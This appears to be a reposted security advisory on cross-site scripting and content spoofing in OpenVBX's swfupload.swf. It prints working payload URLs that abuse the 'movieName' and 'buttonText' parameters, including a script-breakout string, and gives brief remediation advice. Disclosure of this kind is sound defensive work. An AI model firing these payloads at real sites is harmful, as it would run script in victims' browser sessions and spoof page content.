#Title: Cross Site Scripting in OpenVBX
Vector of operation: Remote
Impact: Cross Site Scripting / Content Spoofing
*Info:
"OpenVBX" and "Twilio" are trademarks of Twilio, Inc., all rights reserved. If you want to say something
like "Powered by Twilio" or "Powered by OpenVBX" we'd be honored. If you want to redistribute OpenVBX or the
iPhone app, you must come up with your own product name. Use of the Twilio trademarks in your product name
requires Twilio's written permission.
Vendor: https://github.com/twilio/OpenVBX // https://www.twilio.com
*Description:
The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.
There are two vulnerabilities.
*Content Spoofing
http://[victim]/openvbx/assets/j/swfupload/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>
It's possible to inject text, images and html (e.g. for link injection).
*Cross-Site Scripting
http://[victim]/openvbx/assets/j/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
*Proof of Concept Code
http://[victim]/openvbx/assets/j/swfupload/swfupload.swf?movieName=[XSS]
http://[victim]/openvbx/assets/j/swfupload/swfupload.swf?buttonText=[xss]
*Solution:
On the server side, you can upgrade to a non-vulnerable version. Onthe client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.
Belum ada tanggapan untuk "Cross Site Scripting in OpenVBX"
Post a Comment